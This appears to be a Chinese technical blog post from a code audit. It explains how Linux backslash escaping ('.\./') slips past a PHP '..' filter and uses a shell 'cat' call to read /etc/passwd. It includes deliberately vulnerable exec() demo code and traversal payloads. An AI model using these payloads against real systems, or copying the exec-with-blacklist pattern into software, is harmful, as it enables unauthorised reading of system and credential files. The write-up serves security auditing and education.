linux转义执行顺序,Linux下巧用转义符来完成多阶攻击

最新推荐文章于 2023-08-31 13:49:07 发布
最新推荐文章于 2023-08-31 13:49:07 发布
阅读量55 收藏
点赞数
文章标签: linux转义执行顺序

也是前段时间代码审计:

先上代码:

if (!file_exists($fileName)){header("Content-type: text/html; charset=utf-8");echo "File not found!";exit;

}else{$file = fopen($fileName, "r");Header("Content-type: application/octet-stream");Header("Accept-Ranges: bytes");Header("Accept-Length: ".filesize($fileName));Header("Content-Disposition: attachment; filename=" . $name);$content = fread($file, filesize($fileName));fclose($file);

}return $content;

单单看代码很明显的任意文件下载,在代码的前面多了一行验证:

if(!FileHelper::validatePath($name)) {return "";

}

真的是断了我们的路啊,进去看看:

static function validatePath($file){$items = explode(\'..\', $file);if(count($items) < 2) {return true;

}return false;

}

分割..,目的很纯粹,害怕我们../读取到敏感数据

看下他的$filename定义吧:

$fileName = "/temp/" . $name;

说明就是只希望我们读取/temp/目录下的文件,他的文件上传,都传到了/temp目录下:

这时候你想去读取/etc/passwd根本不现实...

这时候我在思考,../真的无懈可击吗?

打开我的终端:

一步一步来:

正常查看数据:

cat /Users/Desktop/1.html

查看/etc/passwd,跨目录读取需要使用../:

cat /Users/Desktop/../../../etc/passwd

如果不让我们../怎么办?

巧用linux转义符号

\\.=.

echo \\\'

输出单引号,重新读取:

增加转义符,再次读取:

cat /Users/Desktop/.\\./.\\./.\\./etc/passwd

成功读取到/etc/passwd,这里继续,立马投入到fopen函数中:

说干就干:

运行提示没找到文件:

9f55d59acd8947debe218d53d446f658.jpg

而没有像终端一样执行了/etc/passwd,很显然,这里把/.\\./认为是一个目录,而不是../:

后续发现,所有文件操作都把/.\\./认定为目录:

写个demo:

}else{$command = "cat $file";exec($command,$array);print_r($array);

}

其中:

.\\./.\\./.\\./.\\./.\\./etc/passwd =../../../../../etc/passwd

跨目录5次

这里需要创建目录,否则走不了else:

二阶的条件:前置条件:可以自定义创建目录或者文件:

mkdir -p /Users/phptest/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd

再次运行:

42328242a12f4db9bf335327ea6948ba.jpg

因为调用了系统命令,最后.\\./最后变成:

/Users/phptest/../../../../../etc/passwd

从而导致了文件读取成功了.

问题所在:php/java认为.\\.是一个目录

终端命令执行:\\./=../,最终获取/etc/passwd

一次利用:rce使用字符串函数过滤,而不是使用escapeshellarg和escapeshellcmd

demo:

$arrw = array("`", "$", "-","..","||","|","&","&&");foreach ($arrw as $key => $value) {if(strstr($file,$value)){echo "不允许使用..和其他特殊字符串";return "";

}

}$cmd = "cat $file";var_dump($cmd);exec($cmd,$array);print_r($array);

这里命令执行过滤了一些特殊字符串,尤其关照了../,如果你想读取,只能读取/temp/临时目录下的文件,不能跨目录,但是这里调用了系统命令:

使用转义符绕过:

修改demo:

$arrw = array("`", "$", "-","..","||","|","&","&&");foreach ($arrw as $key => $value) {if(strstr($file,$value)){echo "不允许使用..和其他特殊字符串";return "";

}

}$cmd = "cat $file";var_dump($cmd);exec($cmd,$array);print_r($array);

定义我们的$file为/.\\./:

再次运行代码,读取到/etc/passwd

3d4835c7fc974467a43d5d5bc386bd4b.jpg

这个特性还是有很多利用空间的,希望以后代码审计能遇到多阶攻击

weixin_39732609
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux 命令行通配符及转义符的实现
01-10
我们想对一类文件批量操作,例如批量查看硬盘文件属性,那么正常命令会是: [root@linuxprobe ~]# ls /dev/sda [root@linuxprobe ~]# ls /dev/sda1 [root@linuxprobe ~]# ls /dev/sda2 [root@linuxprobe ~]# ls /dev/sda3 但有些时候确实不知道分区的 通配符 星号(*)代表匹配零个或多个字符 huanyu@ubuntu:~$ ls -l /dev/sda*   问号(?)代表匹配单个字符 huanyu@ubuntu:~$ ls -l /dev/sda?   中括号内加
linux中命令行通配符、转义符、重定向符号
凉云半的博客
06-30 218
一、命令行通配符 二、转义字符 三、重定向符号
Linux转义字符是什么?其作用有哪些?
oldboyedu1的博客
08-31 948
Linux系统中,有些符号需要转义之后才可以正确地使用,而且我们常用到的转义字符也很多,比如单引号、双引号、反斜杠、美元符号等。7、重定向符号、|:在某些情况下,这些特殊符号需要进行转义,以防止它们被shell解释为输入、输出重定向或管道操作符。6、ampersand &:在某些情况下,需要对ampersand进行转义,以防止其被解释为后台任务运行符。4、美元符号$:在某些情况下,需要对美元符号进行转义,以避免被shell解释为变量替换。5、百分号%:在某些上下文中,需要对百分号进行转义
linux的管道、重定向、命令行通配符、转义字符与环境变量
qq_30653631的博客
06-28 332
一、管道命令符 管道命令符“|”作用是将前一个命令的标准输出当做后一个命令的标准输入,格式“命令A|命令B” 管道命令可以多次使用,如“命令A|命令B|命令C” 二、输入输出重定向【命令都是左结合】 标准输入(STDIN,文件描述符为0):默认从键盘输入,为0表示是从其他文件或命令的输出 标准输出(STDOUT,文件描述符为1):默认输出到屏幕,为1时表示是文件 错误输出(STDERR...
linux,windows命令行中含有Json字符串如何转义
zhaodengdeng1984的博客
07-02 1291
Linux .\cmc client contract user invoke --contract-name=testTBFT --method=save --sdk-conf-path=.\sdk_config.yml --params="{\"faile_name\":\"name007\",\"file_hash\":\"ab3456df5799b87c77e7f88\",\"time\":\"6543234\"}" --sync-result=true --params的参数是json,整个j
Linux shell编程指南
05-29
本书共分五部分,详细介绍了shell编程技,各种UNIX命令及语法,还涉及了UNIX下的文字处理以及少量的系统管理问题。本书内容全面、文字简洁流畅,适合Shell编程人员学习、参考。 目 录 译者序 前言 第一部分 ...
绝版经典《Linux与UNIX Shell编程指南》
08-07
1.9.1 使用软链接来保存文件的多个映像 12 1.9.2 符号链接举例 12 1.10 小结 13 第2章 使用find和xargs 14 2.1 find命令选项 14 2.1.1 使用name选项 15 2.1.2 使用perm选项 16 2.1.3 忽略某个目录 16 2.1.4 使用user...
linux与unix shell 编程(下)
03-04
1.9.1 使用软链接来保存文件的多个映像 12 1.9.2 符号链接举例 12 1.10 小结 13 第2章 使用find和xargs 14 2.1 find命令选项 14 2.1.1 使用name选项 15 2.1.2 使用perm选项 16 2.1.3 忽略某个目录 16 2.1.4 使用user...
LINUX与UNIX SHELL编程指南(很全)
07-26
1.9.1 使用软链接来保存文件的多个映像 12 1.9.2 符号链接举例 12 1.10 小结 13 第2章 使用find和xargs 14 2.1 find命令选项 14 2.1.1 使用name选项 15 2.1.2 使用perm选项 16 2.1.3 忽略某个目录 16 2.1.4 使用user...
LINUX与UNIX SHELL编程指南
11-29
本书共分五部分,详细介绍了shell编程技,各种UNIX命令及语法,还涉及了UNIX下的文字处理以及少量的系统管理问题。本书内容全面、文字简洁流畅,适合Shell编程人员学习、参考。 目 录 译者序 前言 第一部分 ...
Linux通配符、转义符讲解
m0_49864110的博客
02-12 2918
任意字符都可以通配(也可以匹配空值)?匹配单个字符[a-z] 匹配单个的小写英文字母[A-Z] 匹配单个的大写英文字母[0-9] 匹配单个0-9的数字[a,b,c] 匹配指定的单个字母(a或b或c)[1,2,3] 匹配指定的单个数字(1或2或3),也等同于[123],不过为了严谨建议使用,分隔[a,b,c][1,2,3] 第一个字符匹配指定字母,第二个字符匹配指定数字{a,b,c} 匹配指定的单个字母,如果没有匹配项会报错[]和{}的区别。
linux sed中转义字符的替换
swust_chenpeng的专栏
09-20 1833
在使用sed的时候,经常我们会用来替换字符串,如果被替换的字符串中包含转移字符串怎么办?比如:如果用下面的这种方式,就会替换失败$replace。
linux特殊字符自动转译,Shell命令行中特殊字符与其转义详解(去除特殊含义)
weixin_42515364的博客
05-06 2350
特殊符号及其转义大家都知道在一个shell命令是由命令名和它的参数组成的, 比如cat testfile, 其中cat是命令名, testfile是参数. shell将参数testfile传递给cat命令. 但是, 如果参数中含有特殊字符, 比如说*, *我们知道,是表示任意多个(包括0个)任意字符. 那么shell的工作方式是,它会对这些特殊字符进行预先处理, 然后再将处理的结果传给那个命令.比...
linux命令行中的小横线(-)
热门推荐
Cherry
01-22 1万+
今天在做批量图片重命名的时候发现下列报错 mv: invalid option -- '6' Try `mv --help' for more information. 调查发现是因为文件中有带有-的名字比如 -6MX_oWOu7s.jpg 这个和命令带的参数的标记是一样的,如ls -ltr 解析的时候会错误的把“-ltr”解析为参数,所以也就无法列出“-ltr”中的内
linux转义重定向字符转义,重定向,常用转义字符
weixin_42502643的博客
05-14 1162
1.重定向输出重定向:命令 -->文件:命令到文件$命令 > 文件 :将命令执行的正确结果以文本形式覆盖到指定文件中;$命令 >> 文件 :将命令执行的正确结果以文本形式追加到指定文件中;$命令 2> 文件 :将命令执行的错误结果以文本形式覆盖到指定文件中;$命令 2>> 文件 :将命令执行的错误结果以文本形式追加...
linux 命令 echo 输出 转义字符
严谨死板君的专栏
11-17 1万+
outputlinux 命令 echo 输出 转义字符inputman echo -e enable interpretation of backslash escapesalgo例如#it works below echo -e "1\n2\n3" #it does not work below echo -e 1\n2\n3
命令行转义
止于至善
10-09 3729
命令行中空格的转义:使用斜杠’\’+空格 = 空格,实现转义
linux 转义字符
最新发布
01-06
Linux中,转义字符用于将特殊字符转换为普通字符,以便正确解释和处理。下面是关于Linux转义字符的介绍和示例: 1. 反斜杠(\):反斜杠后面的字符将被视为普通字符,而不是特殊字符。例如,如果你想在文件名中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值